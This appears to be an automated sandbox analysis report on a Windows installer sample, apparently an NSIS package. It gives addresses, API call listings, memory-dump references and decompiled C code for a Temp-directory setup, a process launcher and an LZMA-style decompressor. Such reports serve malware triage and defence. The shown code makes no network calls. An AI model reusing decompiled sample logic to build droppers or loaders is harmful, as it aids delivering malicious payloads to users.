                                                                                                                                                                                                              0x004015fc
                                                                                                                                                                                                              0x004015e5
                                                                                                                                                                                                              0x004015e5
                                                                                                                                                                                                              0x004015e8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004015f3
                                                                                                                                                                                                              0x004015f4
                                                                                                                                                                                                              0x004015f4
                                                                                                                                                                                                              0x004015e8
                                                                                                                                                                                                              0x00401603
                                                                                                                                                                                                              0x0040160a
                                                                                                                                                                                                              0x00401617
                                                                                                                                                                                                              0x00401617
                                                                                                                                                                                                              0x0040160c
                                                                                                                                                                                                              0x0040160d
                                                                                                                                                                                                              0x00401615
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401615
                                                                                                                                                                                                              0x0040160a
                                                                                                                                                                                                              0x0040161a
                                                                                                                                                                                                              0x0040161d
                                                                                                                                                                                                              0x0040161f
                                                                                                                                                                                                              0x00401620
                                                                                                                                                                                                              0x004015d0
                                                                                                                                                                                                              0x00401627
                                                                                                                                                                                                              0x00401652
                                                                                                                                                                                                              0x004022dd
                                                                                                                                                                                                              0x00401629
                                                                                                                                                                                                              0x0040162b
                                                                                                                                                                                                              0x00401636
                                                                                                                                                                                                              0x0040163c
                                                                                                                                                                                                              0x00401644
                                                                                                                                                                                                              0x0040164a
                                                                                                                                                                                                              0x0040164a
                                                                                                                                                                                                              0x00401644
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                                                • Part of subcall function 00405815: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00401631
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Nla
                                                                                                                                                                                                              • API String ID: 1892508949-1238441443
                                                                                                                                                                                                              • Opcode ID: 4f4345dd9ea5b1c43c734929ae91401728168c4be3cc98aed60c332152ba3406
                                                                                                                                                                                                              • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4345dd9ea5b1c43c734929ae91401728168c4be3cc98aed60c332152ba3406
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004058C7(CHAR* _a4) {
                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                                              				int _t7;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				0x422558->cb = 0x44;
                                                                                                                                                                                                              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20); // executed
                                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                                              					CloseHandle(_v20.hThread);
                                                                                                                                                                                                              					return _v20.hProcess;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x004058d0
                                                                                                                                                                                                              0x004058f0
                                                                                                                                                                                                              0x004058f8
                                                                                                                                                                                                              0x004058fd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405903
                                                                                                                                                                                                              0x00405907

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004058FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 004058DA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                                                                                                                                                                              • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                                              			E00406D5A() {
                                                                                                                                                                                                              				signed int _t530;
                                                                                                                                                                                                              				void _t537;
                                                                                                                                                                                                              				signed int _t538;
                                                                                                                                                                                                              				signed int _t539;
                                                                                                                                                                                                              				unsigned short _t569;
                                                                                                                                                                                                              				signed int _t579;
                                                                                                                                                                                                              				signed int _t607;
                                                                                                                                                                                                              				void* _t627;
                                                                                                                                                                                                              				signed int _t628;
                                                                                                                                                                                                              				signed int _t635;
                                                                                                                                                                                                              				signed int* _t643;
                                                                                                                                                                                                              				void* _t644;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					_t530 =  *(_t644 - 0x30);
                                                                                                                                                                                                              					if(_t530 >= 4) {
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *(_t644 - 0x40) = 6;
                                                                                                                                                                                                              					 *(_t644 - 0x7c) = 0x19;
                                                                                                                                                                                                              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L145:
                                                                                                                                                                                                              						 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L149:
                                                                                                                                                                                                              							if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                                              								goto L155;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L150:
                                                                                                                                                                                                              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                                                                                                              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                                                                                                              							 *(_t644 - 0x54) = _t643;
                                                                                                                                                                                                              							_t569 =  *_t643;
                                                                                                                                                                                                              							_t635 = _t569 & 0x0000ffff;
                                                                                                                                                                                                              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                                                                                                              							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                                                                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                                                                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                                                                                                              								_t628 = _t627 + 1;
                                                                                                                                                                                                              								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                                                                                                              								 *(_t644 - 0x50) = _t628;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(_t644 - 0x10) = _t607;
                                                                                                                                                                                                              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                                                                                                              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								L148:
                                                                                                                                                                                                              								_t487 = _t644 - 0x48;
                                                                                                                                                                                                              								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                                                                                                              								L149:
                                                                                                                                                                                                              								if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                                              									goto L155;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L150;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								L154:
                                                                                                                                                                                                              								L146:
                                                                                                                                                                                                              								if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                              									L169:
                                                                                                                                                                                                              									 *(_t644 - 0x88) = 0x18;
                                                                                                                                                                                                              									L170:
                                                                                                                                                                                                              									_t579 = 0x22;
                                                                                                                                                                                                              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                                                                                                              									_t539 = 0;
                                                                                                                                                                                                              									L172:
                                                                                                                                                                                                              									return _t539;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								L147:
                                                                                                                                                                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                                                              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                              								_t484 = _t644 - 0x70;
                                                                                                                                                                                                              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								goto L148;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L155:
                                                                                                                                                                                                              							_t537 =  *(_t644 - 0x7c);
                                                                                                                                                                                                              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L140:
                                                                                                                                                                                                              								 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									L1:
                                                                                                                                                                                                              									_t538 =  *(_t644 - 0x88);
                                                                                                                                                                                                              									if(_t538 > 0x1c) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									L2:
                                                                                                                                                                                                              									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              										case 0:
                                                                                                                                                                                                              											L3:
                                                                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L4:
                                                                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                              											_t538 =  *( *(_t644 - 0x70));
                                                                                                                                                                                                              											if(_t538 > 0xe1) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L5:
                                                                                                                                                                                                              											_t542 = _t538 & 0x000000ff;
                                                                                                                                                                                                              											_push(0x2d);
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_pop(_t581);
                                                                                                                                                                                                              											_push(9);
                                                                                                                                                                                                              											_pop(_t582);
                                                                                                                                                                                                              											_t638 = _t542 / _t581;
                                                                                                                                                                                                              											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                                                                                                              											 *(_t644 - 0x3c) = _t633;
                                                                                                                                                                                                              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                                                                                                              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                                                                                                              											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                                                                                                              												L10:
                                                                                                                                                                                                              												if(_t641 == 0) {
                                                                                                                                                                                                              													L12:
                                                                                                                                                                                                              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                                                                                                              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                                                              													goto L15;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L11;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												do {
                                                                                                                                                                                                              													L11:
                                                                                                                                                                                                              													_t641 = _t641 - 1;
                                                                                                                                                                                                              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                                                                                                              												} while (_t641 != 0);
                                                                                                                                                                                                              												goto L12;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L6:
                                                                                                                                                                                                              											if( *(_t644 - 4) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t644 - 4));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              											 *(_t644 - 4) = _t538;
                                                                                                                                                                                                              											if(_t538 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                                                                                                              												goto L10;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 1:
                                                                                                                                                                                                              											L13:
                                                                                                                                                                                                              											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                              												L157:
                                                                                                                                                                                                              												 *(_t644 - 0x88) = 1;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L14:
                                                                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                              											_t45 = _t644 - 0x48;
                                                                                                                                                                                                              											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                                                                              											L15:
                                                                                                                                                                                                              											if( *(_t644 - 0x48) < 4) {
                                                                                                                                                                                                              												goto L13;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L16:
                                                                                                                                                                                                              											_t550 =  *(_t644 - 0x40);
                                                                                                                                                                                                              											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                                                                                                              												L20:
                                                                                                                                                                                                              												 *(_t644 - 0x48) = 5;
                                                                                                                                                                                                              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              												goto L23;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L17:
                                                                                                                                                                                                              											 *(_t644 - 0x74) = _t550;
                                                                                                                                                                                                              											if( *(_t644 - 8) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t644 - 8));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                                                                                                              											 *(_t644 - 8) = _t538;
                                                                                                                                                                                                              											if(_t538 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 2:
                                                                                                                                                                                                              											L24:
                                                                                                                                                                                                              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                                                                                                              											 *(_t644 - 0x84) = 6;
                                                                                                                                                                                                              											 *(_t644 - 0x4c) = _t557;
                                                                                                                                                                                                              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 3:
                                                                                                                                                                                                              											L21:
                                                                                                                                                                                                              											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                              												L158:
                                                                                                                                                                                                              												 *(_t644 - 0x88) = 3;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L22:
                                                                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                              											_t67 = _t644 - 0x70;
                                                                                                                                                                                                              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L23:
                                                                                                                                                                                                              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                                                                                                              											if( *(_t644 - 0x48) != 0) {
                                                                                                                                                                                                              												goto L21;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L24;
                                                                                                                                                                                                              										case 4:
                                                                                                                                                                                                              											L133:
                                                                                                                                                                                                              											_t559 =  *_t642;
                                                                                                                                                                                                              											_t626 = _t559 & 0x0000ffff;
                                                                                                                                                                                                              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                                                                                                              											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                                                                                                              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                                                                                                              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                                                                                                              												 *(_t644 - 0x40) = 1;
                                                                                                                                                                                                              												_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                                                              												__eflags = _t560;
                                                                                                                                                                                                              												 *_t642 = _t560;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(_t644 - 0x10) = _t596;
                                                                                                                                                                                                              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L139;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L137;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 5:
                                                                                                                                                                                                              											L137:
                                                                                                                                                                                                              											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                              												L168:
                                                                                                                                                                                                              												 *(_t644 - 0x88) = 5;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L138:
                                                                                                                                                                                                              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L139:
                                                                                                                                                                                                              											_t537 =  *(_t644 - 0x84);
                                                                                                                                                                                                              											L140:
                                                                                                                                                                                                              											 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                              											goto L1;
                                                                                                                                                                                                              										case 6:
                                                                                                                                                                                                              											L25:
                                                                                                                                                                                                              											__edx = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												L36:
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												goto L132;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L26:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              											__cl = 8;
                                                                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              													_t98 = __ebp - 0x38;
                                                                                                                                                                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              													__eflags =  *_t98;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              												L35:
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												L32:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												goto L41;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 7:
                                                                                                                                                                                                              											L66:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              												L68:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												goto L69;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L67:
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              											goto L132;
                                                                                                                                                                                                              										case 8:
                                                                                                                                                                                                              											L70:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L132;
